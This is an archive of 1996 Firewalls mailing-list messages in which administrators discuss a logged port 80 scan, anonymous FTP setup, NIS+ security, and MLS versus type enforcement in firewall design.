Jan 30 11:20:49.028: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39633) -> X.X.211.179(80), 1 packet
Jan 30 11:20:49.032: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39629) -> X.X.211.115(80), 1 packet
Jan 30 11:20:49.032: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39634) -> X.X.211.195(80), 1 packet
Jan 30 11:20:49.036: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39628) -> X.X.211.99(80), 1 packet
Jan 30 11:20:49.040: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39631) -> X.X.211.147(80), 1 packet
Jan 30 11:20:49.040: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39630) -> X.X.211.131(80), 1 packet

The node in question here has scanned a few other subnets looking for
connections to port 80. Is this a recognised scanning program or something
home grown? I have attempted to contact someone at the remote network, but
have not received a response.

Glen Larwill - glarwill@cbe.ab.ca             _/_/_/_/  _/_/_/_/  _/_/_/_/
PH (403) 294-8380, FAX (403) 294-8431         _/        _/    _/  _/
Network Systems Software Analyst              _/        _/_/_/_/  _/_/_/
Calgary Board of Education                    _/        _/    _/  _/
Calgary Alberta, Canada                       _/_/_/_/  _/_/_/_/  _/_/_/_/

From firewalls-owner Thu Feb 1 10:27:36 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA24850 for firewalls-outgoing; Thu, 1 Feb 1996 10:20:29 -0800 (PST)
Received: from relay7.UU.NET (relay7.UU.NET [192.48.96.17]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id KAA24845 for ; Thu, 1 Feb 1996 10:20:22 -0800 (PST)
Received: from rssi.com by relay7.UU.NET with SMTP id QQabbl29496; Thu, 1 Feb 1996 13:19:09 -0500 (EST)
Received: from mel.rssi.com by rssi.com (SMI-8.6/SMI-SVR4) id NAA16637; Thu, 1 Feb 1996 13:19:07 -0500
Received: by mel.rssi.com (5.x/SMI-SVR4) id AA01125; Thu, 1 Feb 1996 13:14:49 -0500
Date: Thu, 1 Feb 1996 13:14:49 -0500
From: Brad VanOrden
Message-Id: <9602011814.AA01125@mel.rssi.com>
To: maddouri@ensi.rnrt.tn, firewalls@GreatCircle.com
Subject: Re: Securing an anonymous ftp acces
X-Sun-Charset: US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Mondher,

I would suggest two sources. I have always found "UNIX System Administration
Handbook" by Evi Nemeth, Garth Snyder, and Scott Seebass to be invaluable and
they tell you how to set up anonymous ftp. It is published by Prentice Hall
and had a 2nd edition published about one year ago. You can reach them at
800-947-7700.

The other is CERT advisory 93:10. It is available via anonymous ftp at:
cert.org/pub/cert_advisories/CA-93:10.anonymous.FTP.activity. This also gives
you detailed instructions on how to set up anonymous ftp.

Hope this helps!
Brad Van Orden
Rapid Systems Solutions

From firewalls-owner Thu Feb 1 11:09:37 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA26677 for firewalls-outgoing; Thu, 1 Feb 1996 11:06:08 -0800 (PST)
Received: from relay2.UU.NET (relay2.UU.NET [192.48.96.7]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id LAA26672 for ; Thu, 1 Feb 1996 11:06:02 -0800 (PST)
Received: from maestro.Maestro.COM by relay2.UU.NET with SMTP id QQabbo28655; Thu, 1 Feb 1996 14:03:56 -0500 (EST)
Received: by maestro.Maestro.COM (4.1/MAESTRO-0.1/07-03-93) id AA17242; Thu, 1 Feb 96 13:53:22 EST
Date: Thu, 1 Feb 1996 13:53:21 -0500 (EST)
From: Sick Puppy
To: firewalls@GreatCircle.com
Subject: Windows 95 clobbering firewall?
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

(Subject: Sick Puppy struggles to appear legitimate)

I have a couple of sniffers in a network, one just inside the firewall
and the other right next to the network management system.
The last time I looked at these was about six weeks ago and when
looking today I see something new.

The DNS running in the firewall used to get about 10 connects every 12
hours from the company's internal mail system but now the firewall DNS is
getting about 10,800 connects every day from the network management
system (NMS). The sniffer watching the NMS shows that new Windows
95 machines are connecting to it with NetBios on port 137, NetBios Name
Service. It looks like the NMS box in turn queries the firewall.

The firewall itself seems to be a Pentium machine, handling about 4,000
incoming messages per day, 3,000 outgoing messages per day and a web user
population of about 150 users.

Two questions:
1) will the increased DNS queries cause the firewall performance
   (throughput/response time) to drop;
2) has anyone else seen a similar situation;
3) how would you stop these evil little Windows 95 weevils from
   nibbling away at the firewall DNS?

Yeah, I know. Dawgs have trouble counting.

Sick Puppy, the Cat_Eating_Dawg
Photonic & Tachyonic Systems Engineer of the Stealth Starship Dark Matter

From firewalls-owner Thu Feb 1 13:23:35 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA01287 for firewalls-outgoing; Thu, 1 Feb 1996 13:18:52 -0800 (PST)
Received: from hatteras.ch.inri.com (hatteras.ch.inri.com [198.202.184.13]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA01278 for ; Thu, 1 Feb 1996 13:18:45 -0800 (PST)
Received: from assateague (assateague.ch.inri.com [198.202.184.111]) by hatteras.ch.inri.com (8.6.12/8.6.6) with SMTP id QAA13623; Thu, 1 Feb 1996 16:20:21 -0500
Date: Thu, 1 Feb 1996 16:20:21 -0500
Message-Id: <199602012120.QAA13623@hatteras.ch.inri.com>
X-Sender: wlb@hatteras.ch.inri.com
X-Mailer: Windows Eudora Version 1.4.4
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: netmgr02@cbe.ab.ca (Glen Larwill), firewalls@GreatCircle.COM
From: wbunting@ch.inri.com (Bill Bunting)
Subject: Re: Scanning from afar...
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hmmm. Someone really wants to know if you are running any WWW servers.
Given the times between access list logs, they must be using a scanning
tool.

At 10:36 AM 2/1/96 -0700, Glen Larwill wrote:
>Has anyone seen this type of network scanning before? Addresses have been
>changed to protect the innocent and the guilty.
>
>Jan 30 11:14:41.922: %SEC-6-IPACCESSLOGP: list 111 denied tcp
>X.X.143.14(39620) -> X.X.211.227(80), 1 packet
>Jan 30 11:14:42.962: %SEC-6-IPACCESSLOGP: list 111 denied tcp
>X.X.143.14(39621) -> X.X.211.243(80), 1 packet
>Jan 30 11:14:44.054: %SEC-6-IPACCESSLOGP: list 111 denied tcp
>X.X.143.14(39622) -> X.X.211.3(80), 1 packet
>Jan 30 11:14:45.070: %SEC-6-IPACCESSLOGP: list 111 denied tcp
>X.X.143.14(39623) -> X.X.211.19(80), 1 packet
>Jan 30 11:14:46.294: %SEC-6-IPACCESSLOGP: list 111 denied tcp
>X.X.143.14(39624) -> X.X.211.35(80), 1 packet
>Jan 30 11:14:46.918: %SEC-6-IPACCESSLOGP: list 111 denied tcp
>X.X.143.14(39625) -> X.X.211.51(80), 1 packet
>Jan 30 11:14:47.922: %SEC-6-IPACCESSLOGP: list 111 denied tcp
>X.X.143.14(39626) -> X.X.211.67(80), 1 packet
>Jan 30 11:14:48.918: %SEC-6-IPACCESSLOGP: list 111 denied tcp
>X.X.143.14(39627) -> X.X.211.83(80), 1 packet
>Jan 30 11:14:49.910: %SEC-6-IPACCESSLOGP: list 111 denied tcp
>X.X.143.14(39628) -> X.X.211.99(80), 1 packet
>Jan 30 11:14:50.922: %SEC-6-IPACCESSLOGP: list 111 denied tcp
>X.X.143.14(39629) -> X.X.211.115(80), 1 packet
>Jan 30 11:14:51.926: %SEC-6-IPACCESSLOGP: list 111 denied tcp
>X.X.143.14(39630) -> X.X.211.131(80), 1 packet
>Jan 30 11:14:52.930: %SEC-6-IPACCESSLOGP: list 111 denied tcp
>X.X.143.14(39631) -> X.X.211.147(80), 1 packet
>Jan 30 11:14:53.918: %SEC-6-IPACCESSLOGP: list 111 denied tcp
>X.X.143.14(39632) -> X.X.211.163(80), 1 packet
>Jan 30 11:14:54.978: %SEC-6-IPACCESSLOGP: list 111 denied tcp
>X.X.143.14(39633) -> X.X.211.179(80), 1 packet
>Jan 30 11:14:55.958: %SEC-6-IPACCESSLOGP: list 111 denied tcp
>X.X.143.14(39634) -> X.X.211.195(80), 1 packet
>Jan 30 11:14:56.934: %SEC-6-IPACCESSLOGP: list 111 denied tcp
>X.X.143.14(39635) -> X.X.211.211(80), 1 packet
>Jan 30 11:19:48.988: %SEC-6-IPACCESSLOGP: list 111 denied tcp
>X.X.143.14(39621) -> X.X.211.243(80), 1 packet
>Jan 30 11:19:48.988: %SEC-6-IPACCESSLOGP: list 111 denied tcp
>X.X.143.14(39623) -> X.X.211.19(80), 1 packet
>Jan 30 11:19:48.992: %SEC-6-IPACCESSLOGP: list 111 denied tcp
>X.X.143.14(39622) -> X.X.211.3(80), 1 packet
>Jan 30 11:19:48.996: %SEC-6-IPACCESSLOGP: list 111 denied tcp
>X.X.143.14(39627) -> X.X.211.83(80), 1 packet
>Jan 30 11:19:48.996: %SEC-6-IPACCESSLOGP: list 111 denied tcp
>X.X.143.14(39626) -> X.X.211.67(80), 1 packet
>Jan 30 11:19:49.000: %SEC-6-IPACCESSLOGP: list 111 denied tcp
>X.X.143.14(39620) -> X.X.211.227(80), 1 packet
>Jan 30 11:19:49.004: %SEC-6-IPACCESSLOGP: list 111 denied tcp
>X.X.143.14(39624) -> X.X.211.35(80), 1 packet
>Jan 30 11:19:49.004: %SEC-6-IPACCESSLOGP: list 111 denied tcp
>X.X.143.14(39625) -> X.X.211.51(80), 1 packet
>Jan 30 11:20:49.024: %SEC-6-IPACCESSLOGP: list 111 denied tcp
>X.X.143.14(39632) -> X.X.211.163(80), 1 packet
>Jan 30 11:20:49.024: %SEC-6-IPACCESSLOGP: list 111 denied tcp
>X.X.143.14(39635) -> X.X.211.211(80), 1 packet
>Jan 30 11:20:49.028: %SEC-6-IPACCESSLOGP: list 111 denied tcp
>X.X.143.14(39633) -> X.X.211.179(80), 1 packet
>Jan 30 11:20:49.032: %SEC-6-IPACCESSLOGP: list 111 denied tcp
>X.X.143.14(39629) -> X.X.211.115(80), 1 packet
>Jan 30 11:20:49.032: %SEC-6-IPACCESSLOGP: list 111 denied tcp
>X.X.143.14(39634) -> X.X.211.195(80), 1 packet
>Jan 30 11:20:49.036: %SEC-6-IPACCESSLOGP: list 111 denied tcp
>X.X.143.14(39628) -> X.X.211.99(80), 1 packet
>Jan 30 11:20:49.040: %SEC-6-IPACCESSLOGP: list 111 denied tcp
>X.X.143.14(39631) -> X.X.211.147(80), 1 packet
>Jan 30 11:20:49.040: %SEC-6-IPACCESSLOGP: list 111 denied tcp
>X.X.143.14(39630) -> X.X.211.131(80), 1 packet
>
>The node in question here has scanned a few other subnets looking for
>connections to port 80. Is this a recognised scanning program or something
>home grown?
>
>I have attempted to contact someone at the remote network, but have not
>received a response.
>
> Glen Larwill - glarwill@cbe.ab.ca            _/_/_/_/  _/_/_/_/  _/_/_/_/
> PH (403) 294-8380, FAX (403) 294-8431       _/        _/    _/  _/
> Network Systems Software Analyst            _/        _/_/_/_/  _/_/_/
> Calgary Board of Education                  _/        _/    _/  _/
> Calgary Alberta, Canada                      _/_/_/_/  _/_/_/_/  _/_/_/_/
>
>

---------------------------------------
| Bill Bunting, Software Engineer       |         ******
|Inter-National Research Institute, Inc.|      ***_******_ __ _
| 1441 Crossways Boulevard, Suite 102   |   ===//=/\**//=/- )==//=
| Chesapeake, Virginia 23320            |   {==//=//\\//=//||==//==
| V(804)424-8675 F(804)420-4262         |    =//=//==\/*//=||=//===
| (wbunting@inri.com)                   |        *********
| (bunting@cs.odu.edu)                  |          *****
| http://www.cs.odu.edu/~bunting        |
---------------------------------------

From firewalls-owner Thu Feb 1 13:43:55 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA01454 for firewalls-outgoing; Thu, 1 Feb 1996 13:29:39 -0800 (PST)
Received: from main.geminisecure.com (main.geminisecure.com [205.179.16.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA01449 for ; Thu, 1 Feb 1996 13:29:35 -0800 (PST)
Received: (from leonard@localhost) by main.geminisecure.com (8.6.9/8.6.9) id NAA15680; Thu, 1 Feb 1996 13:18:10 -0800
Date: Thu, 1 Feb 1996 13:18:10 -0800 (PST)
From: Leonard Miyata
To: Jane Ferreira Cunha
cc: firewalls@GreatCircle.COM
Subject: Re: What are MLS and TE?
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Thu, 1 Feb 1996, Jane Ferreira Cunha wrote:
>
>
> Please, where can I find some explanation about MLS and TE? I've
> seen a lot of discussion about them, but so far I could understand it.
> Are they in a FAQ somewhere?
>
> TIA,
>
> Jane

For MLS, the official standards are Department of Defense Trusted Computer
System Evaluation Criteria (TCSEC) DOD 5200.28-STD and the Trusted
Network Interpretation (TNI) NCSC-TG-005.
A good book for the Operating System implications is 'Building A Secure
Computer System' by Morrie Gasser.

For TE, the best source is probably the SCC Web site. I believe there is a
recent article in BYTE magazine (Jan or Feb 96) as well.

Leonard Miyata aka leonard@geminisecure.com
GEMINI COMPUTERS INC
Company web site http://www.geminisecure.com

From firewalls-owner Thu Feb 1 13:58:37 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA01498 for firewalls-outgoing; Thu, 1 Feb 1996 13:32:33 -0800 (PST)
Received: from solarnum.itd.uts.edu.au (solarnum.itd.uts.EDU.AU [138.25.16.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id NAA01493 for ; Thu, 1 Feb 1996 13:32:27 -0800 (PST)
Received: from maverick.itd.uts.edu.au (matt@maverick.itd.uts.EDU.AU [138.25.16.41]) by solarnum.itd.uts.edu.au (8.7.3/8.7.1/uts) with ESMTP id IAA24564; Fri, 2 Feb 1996 08:29:03 +1100 (EST)
Received: (from matt@localhost) by maverick.itd.uts.edu.au (8.7.3/8.7.3/Jas) id IAA17222; Fri, 2 Feb 1996 08:35:19 +1100
From: Jas (Matthew K)
Message-Id: <199602012135.IAA17222@maverick.itd.uts.edu.au>
Subject: Re: Internet-access from Novell
To: ewoodrick@ed-com.com (Ed Woodrick)
Date: Fri, 2 Feb 1996 08:35:18 +1100 (EST)
Cc: firewalls@greatcircle.com (Firewalls Mailing List)
In-Reply-To: from "Ed Woodrick" at Feb 1, 96 07:27:52 am
X-Gcb: -----BEGIN GEEK CODE BLOCK-----
X-Gcb: Version: 3.1
X-Gcb: GAT/M/CS d-(++) s++:-- a-(?) C+++$ UVS++++$ P+++ L+ E++ W++ N++
X-Gcb: !o K+ w--- O+ M+ V-- PS+ PE+ Y+ PGP++ t+ 5+ X++ R tv- b++ DI+
X-Gcb: D+ e h- r !y
X-Gcb: ------END GEEK CODE BLOCK------
X-Ph: ph: +61 2 330 1390 fax: +61 2 330 1999 home: +61 2 9929 0717
X-Pager: +61 2 214 1111 #849482 or 849482@pager.link.com.au
X-Pgp-Finger: pub 2048/27FB4AE1 1995/09/30 Jas (Matthew K)
X-Pgp-Finger: Key fingerprint = 3A1EEDBE7A6D498D E7953FB40A21A6C8
X-Mailer: ELM [version 2.4 PL25]
Content-Type: text
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Ed Woodrick wrote this...
> I know that this is probably a radical answer, but what about using
> Novell access permissions to restrict access to the data? I don't
> know why you would want to go to the trouble of putting up firewalls
> when just a simple permission change should work. It's a lot easier
> and I expect a lot safer to perform security at the operating system
> level than at the network level.
> Ed Woodrick

ARGH! Isn't the failure to do this with Unix a lesson?? Just setting user
permission access to data normally isn't enough (unless you have a B2+
system with MAC and even then sometimes). Novell can be hacked, and if you
leave the network open someone will do it.

Matt
--
#!/bin/sh
echo '16i[q]sa[ln0=aln100%Pln100/snlbx]sbA0D3F204445524F42snlbxq'|dc;exit
Matthew Keenan                  Data Network Admin
Information Technology Division
University of Technology Sydney Australia

It's nice to be in a position where people apologize because they assume
there's humor in your work, based on past experience, but they're not sure
where it is.
                                                        -- Rob Pike

From firewalls-owner Thu Feb 1 14:28:21 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA03013 for firewalls-outgoing; Thu, 1 Feb 1996 14:20:19 -0800 (PST)
Received: from sparc14.cs.uiuc.edu (sparc14.cs.uiuc.edu [128.174.244.24]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id OAA03008 for ; Thu, 1 Feb 1996 14:20:14 -0800 (PST)
Received: (from jwthomp@localhost) by sparc14.cs.uiuc.edu (8.7.3/8.7.3) id QAA01008; Thu, 1 Feb 1996 16:15:13 -0600 (CST)
From: thompson jeffrey w
Message-Id: <199602012215.QAA01008@sparc14.cs.uiuc.edu>
Subject: Re: What are MLS and TE?
To: leonard@geminisecure.com (Leonard Miyata)
Date: Thu, 1 Feb 1996 16:15:12 -0600 (CST)
Cc: jane@gwosi.telesc.gov.br, firewalls@GreatCircle.COM
In-Reply-To: from "Leonard Miyata" at Feb 1, 96 01:18:10 pm
Reply-To: jwthomp@uiuc.edu
X-Mailer: ELM [version 2.4 PL24]
Content-Type: text
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> On Thu, 1 Feb 1996, Jane Ferreira Cunha wrote:
> >
> >
> > Please, where can I find some explanation about MLS and TE? I've
> > seen a lot of discussion about them, but so far I could understand it.
> > Are they in a FAQ somewhere?
> >
> > TIA,
> >
> > Jane
>
> For MLS, the official standards are Department of Defense Trusted Computer
> System Evaluation Criteria (TCSEC) DOD 5200.28-STD and the Trusted
> Network Interpretation (TNI) NCSC-TG-005 . A good book for the
> Operating System implications is 'Building A Secure Computer System' by
> Morrie Gasser.
>
> For TE, the best source is probably the SCC Web site. I
> believe there is a recent article in BYTE magazine (Jan or Feb 96)
> as well
>

I also recommend looking at the TSIG pages at http://www.sterling.com

Best of luck,
Jeff Thompson

Jeff Thompson(jwthomp@uiuc.edu)                 Argus Systems Group
http://www.uiuc.edu/ph/www/jwthomp              - Trusted Systems
Network Programmer
ACM at UIUC Vice Chair / SigNET Chair           Member *The Guild

From firewalls-owner Thu Feb 1 14:32:25 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA01464 for firewalls-outgoing; Thu, 1 Feb 1996 13:30:11 -0800 (PST)
Received: from solarnum.itd.uts.edu.au (solarnum.itd.uts.EDU.AU [138.25.16.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id NAA01459 for ; Thu, 1 Feb 1996 13:30:02 -0800 (PST)
Received: from maverick.itd.uts.edu.au (matt@maverick.itd.uts.EDU.AU [138.25.16.41]) by solarnum.itd.uts.edu.au (8.7.3/8.7.1/uts) with ESMTP id IAA24481; Fri, 2 Feb 1996 08:26:34 +1100 (EST)
Received: (from matt@localhost) by maverick.itd.uts.edu.au (8.7.3/8.7.3/Jas) id IAA17213; Fri, 2 Feb 1996 08:32:50 +1100
From: Jas (Matthew K)
Message-Id: <199602012132.IAA17213@maverick.itd.uts.edu.au>
Subject: Re: NIS+
To: fina@novo.dk (Finn T Andersen)
Date: Fri, 2 Feb 1996 08:32:49 +1100 (EST)
Cc: firewalls@GreatCircle.COM
In-Reply-To: <9602011239.ZM14289@eagle.novo.dk> from "Finn T Andersen" at Feb 1, 96 12:39:49 pm
X-Gcb: -----BEGIN GEEK CODE BLOCK-----
X-Gcb: Version: 3.1
X-Gcb: GAT/M/CS d-(++) s++:-- a-(?) C+++$ UVS++++$ P+++ L+ E++ W++ N++
X-Gcb: !o K+ w--- O+ M+ V-- PS+ PE+ Y+ PGP++ t+ 5+ X++ R tv- b++ DI+
X-Gcb: D+ e h- r !y
X-Gcb: ------END GEEK CODE BLOCK------
X-Ph: ph: +61 2 330 1390 fax: +61 2 330 1999 home: +61 2 9929 0717
X-Pager: +61 2 214 1111 #849482 or 849482@pager.link.com.au
X-Pgp-Finger: pub 2048/27FB4AE1 1995/09/30 Jas (Matthew K)
X-Pgp-Finger: Key fingerprint = 3A1EEDBE7A6D498D E7953FB40A21A6C8
X-Mailer: ELM [version 2.4 PL25]
Content-Type: text
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Finn T Andersen wrote this...
> There has been a lot of good information and suggestions about NIS
> recently, however, no one has mentioned anything about NIS+. I have
> heard that NIS+ should be a very secure system, but in fact I have
> never heard about anyone who was using it. Is it available, and on
> what platforms ?

Yes, NIS+ is far more secure than NIS. It uses SecureRPC to form the
underlying basis of its security, and uses access control lists for data in
the tables (even down to individual table entries, ie everyone owns their
own passwd entry so you can only see your own encrypted password field).
It also supports network encryption of certain fields (down to individual
entries within a table entry) on versions shipped within the US.

SecureRPC is based on Diffie-Hellman for key exchange, and DES for
encryption/authentication. It does have time limited credentials and most
of the other good stuff, and has been around for a while. Most NFS
implementations support SecureRPC as a securing method (ie only you can
read your files, and root can only read your files while you're logged in;
network traffic with secure NFS is encrypted (with your key)).

Last I heard NIS+ had been adopted by COSE (I could be completely wrong
here), so all the COSE people should be supporting it at _some_ stage.
Last I heard the only major Unix player who wasn't eventually going to
start using NIS+ was SGI, but again I could be wrong. I haven't looked at
the COSE side of NIS+ for over a year now.

If anyone has any deeper questions about using NIS+ as an authentication
method etc et al, ask... I admined a 6000 user site using NIS+ for almost
18 months.. now I only admin a 2000 user site :| (again using NIS+).

Matt
--
#!/bin/sh
echo '16i[q]sa[ln0=aln100%Pln100/snlbx]sbA0D3F204445524F42snlbxq'|dc;exit
Matthew Keenan                  Data Network Admin
Information Technology Division
University of Technology Sydney Australia

It's nice to be in a position where people apologize because they assume
there's humor in your work, based on past experience, but they're not sure
where it is.
                                                        -- Rob Pike

From firewalls-owner Thu Feb 1 14:53:31 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA03898 for firewalls-outgoing; Thu, 1 Feb 1996 14:40:50 -0800 (PST)
Received: from gatekeeper.qualix.com (gatekeeper.qualix.com [192.91.182.105]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA03883 for ; Thu, 1 Feb 1996 14:40:44 -0800 (PST)
Received: from qualix.qualix by gatekeeper.qualix.com (8.6.9/Q940531.1) id OAA05764; Thu, 1 Feb 1996 14:39:44 -0800
Received: from qualix20.qualix by qualix.qualix (4.1/SMI-4.1-Q931113.1) id AA25086; Thu, 1 Feb 96 14:39:43 PST
Received: from patience5.qualix by qualix20.qualix (SMI-8.6/SMI-SVR4) id OAA11978; Thu, 1 Feb 1996 14:39:39 -0800
Received: by patience5.qualix (SMI-8.6/SMI-SVR4) id OAA05576; Thu, 1 Feb 1996 14:39:38 -0800
Date: Thu, 1 Feb 1996 14:39:38 -0800
From: hle@qualix.com (Hung Le)
Message-Id: <199602012239.OAA05576@patience5.qualix>
To: firewalls@greatcircle.com
Subject: Re: Fault Tolerant Firewall
Cc: mdr@vodka.sse.att.com
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Content-Md5: pB+8z683tZlWnKTQqyttDg==
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> I've seen configurations using dual ported SCSI that were able to get
> going much faster than that.
> If Machine A went down, Machine B would
> take over its disk drives and start up new services. The disk
> themselves were striped RAID. I think it used a heart beat to
> determine when A had died. The nice part of the arrangement was that
> if both machines had separate services, they could back up each
> other. If memory serves, 3-5 minutes is a better figure plus a
> configurable amount of time to make sure that A is indeed "down".
>

Sounds like Qualix SecureWatch environment. Currently, it only supports
Checkpoint Firewall-1. But the environment is fairly flexible and can be
made to support other firewall systems. For more information see URL:
http://www.qualix.com/sysman/product/securewatch.htmld/

> I'd call this fault-resilient, not fault tolerant. But it may be
> less expensive to get 2 cheap boxes than 1 expensive special purpose
> fault tolerant-in-the-hardware box.
>
> Mark Riggins
>
>

% ---
% Hung H. Le - Qualix Group, Inc.     hle@qualix.com or uunet!qualix!hle
% Voice: 415.572.0200   FAX: 415.572.1300
% Qualix Group WWW server: "http://www.qualix.com"

From firewalls-owner Thu Feb 1 16:08:26 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA06892 for firewalls-outgoing; Thu, 1 Feb 1996 15:56:44 -0800 (PST)
Received: from beach.sctc.com (beach.sctc.com [192.55.214.50]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id PAA06879 for ; Thu, 1 Feb 1996 15:56:34 -0800 (PST)
Received: from beach.sctc.com (daemon@localhost) by beach.sctc.com (8.7.2/8.7.2) with ESMTP id RAA06419; Thu, 1 Feb 1996 17:54:52 -0600 (CST)
Received: from sphinx.sctc.com (sphinx.sctc.com [172.17.192.3]) by beach.sctc.com (8.7.2/8.7.2) with ESMTP id RAA06415; Thu, 1 Feb 1996 17:54:51 -0600 (CST)
Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by sphinx.sctc.com (8.7.1/8.6.10) with SMTP id RAA16495; Thu, 1 Feb 1996 17:55:24 -0600 (CST)
Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id RAA16089; Thu, 1 Feb 1996 17:55:26 -0600
Date: Thu, 1 Feb 1996 17:55:26 -0600
From: Rick Smith
Message-Id: <199602012355.RAA16089@shade.sctc.com>
To: firewalls@greatcircle.com
Cc: smith@sctc.com, watt@sware.com
Subject: Re: Mandatory protection (was: product selection)
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Charles Watt writes:

>Actually, Rick, your analysis below does show a lack of
>understanding in the capabilities of most MLS systems. Your
>analysis assumes that the MAC labels enforced by such systems
>are strictly hierarchical, e.g.:

Excuse me, but I doubt you could do any of this without categories and/or
compartments. I am surprised that you could infer their absence from that
message. MLS couldn't come even close to competing with type enforcement
if it lacked non-hierarchical labels.

>Here your understanding of MLS networking breaks down. Read
>the existing standards, such as RFC 1108 or the DoD's Common Security
>Label spec.

Naturally I've read various IPSO specs. Labeled IP is largely irrelevant
to the firewalls marketplace today, and I suspect they will remain so for
the next few years (perhaps an interesting topic for a different thread).
We sell very, very little to sites that use labeled IP protocols. Most
people need to interoperate with standard hosts operating without IPSO
labels.

Your subsequent comments are correct only if you are operating with
labeled interfaces and you associate labels with individual services. This
is, of course, an unlikely application of labels on Internet traffic.

>Now I'm not an expert on Type Enforcement, but we do have a couple
>of ex-SCC developers here. We've discussed the pros/cons of
>TE vs. MLS at length for quite some time and have come to the conclusion
>that ANYTHING that can be done with TE can also be done with MLS and
>vice versa. Of course the architectures are different, and some
>problems fit more naturally with one or the other approach. But the
>capabilities are virtually identical, particularly when applied to
>firewalls and similar separation problems.

The bottom line is, of course, that both are forms of mandatory access
control. We all agree on that point. (Hi, Barry).

Rick.
smith@sctc.com          secure computing corporation

From firewalls-owner Thu Feb 1 16:09:05 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA06489 for firewalls-outgoing; Thu, 1 Feb 1996 15:42:07 -0800 (PST)
Received: from garrison.com. (garrison.garrison.com [199.1.78.14]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA06475 for ; Thu, 1 Feb 1996 15:41:58 -0800 (PST)
Received: by garrison.com. (4.1/Nutered Mailer) id AA04194; Thu, 1 Feb 96 17:37:50 CST
Date: Thu, 1 Feb 96 17:37:50 CST
From: jeromie@garrison.com (Jeromie Jackson)
Message-Id: <9602012337.AA04194@garrison.com.>
To: mdr@vodka.sse.att.com, smith@sctc.com
Subject: Re: Mandatory protection (was: product selection)
Cc: firewalls@greatcircle.com, jgt10@amdahl.com
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> I've always recognized that MLS systems can impose mandatory
> protection barriers between processes by using levels,
> categories, and compartments, but I still concluded "No."
> This is based on my view of high assurance MLS obsessed with
> confidentiality. The argument goes as follows:
>
> 1) Typical Internet TCP/IP traffic does not contain labels.
> 2) The network interface in an MLS system is always assigned
>    a label.
> 3) If a network interface receives a packet that does not
>    already contain a label, then the packet must be assigned
>    the network interface's label.
> 4) All packets sent or received as typical Internet TCP/IP
>    traffic carry the same label (from 1, 2, 3). Call this
>    label the "Internet Label."
> 5) If two processes have the same label, there is no way to
>    enforce mandatory MLS protection between them.
> 6) Every network server process is assigned a label.
> 7) A network server process can only send and receive
>    packets if the packets' labels are identical to the label
>    of the network server process.
> 8) Any network server process that handles Internet traffic
>    must be assigned the "Internet Label" (from 4, 7).
> 9) All Internet server processes must be assigned the
>    "Internet Label" (from 6, 8).
> 10) You can't enforce MLS between Internet servers (from 5, 9).
>
> I suspect our misunderstandings are tied to statement 3)
> above. On Sidewinder we can associate TCP/IP port numbers
> with separately labeled domains in the TE system. The only
> way you can get a similar result in an MLS system is to
> associate TCP/IP port numbers with MLS confidentiality
> labels. For example, the B1 system might define a category
> or compartment label for "Mail" and restrict Port 25
> traffic to processes with the Mail label. If so, this changes
> how statement 3) is phrased, and completely changes the
> conclusion.
>
> The problem is, you can't assign MLS labels that way if
> you're obsessed with confidentiality. I can think of
> three reasons immediately as to why not:
>

I would propose a different use for the MLS architecture.

outside---o.proxies----i.proxies-----inside

o.proxies have level of '1'.
i.proxies have level of '2'.
o.proxies do not have access to write to the inside ethernet interface.
i.proxies have privilege to read o.proxies based on label being dominant.

From what I see, this would make a connection-based attack useless. You
could break into the firewall and subvert the o.proxies. Data-based
attacks could potentially succeed if neither proxies noticed the
signature. Connection based attacks would be limited to harming the level
'1' environment.

I would be interested in hearing comments...

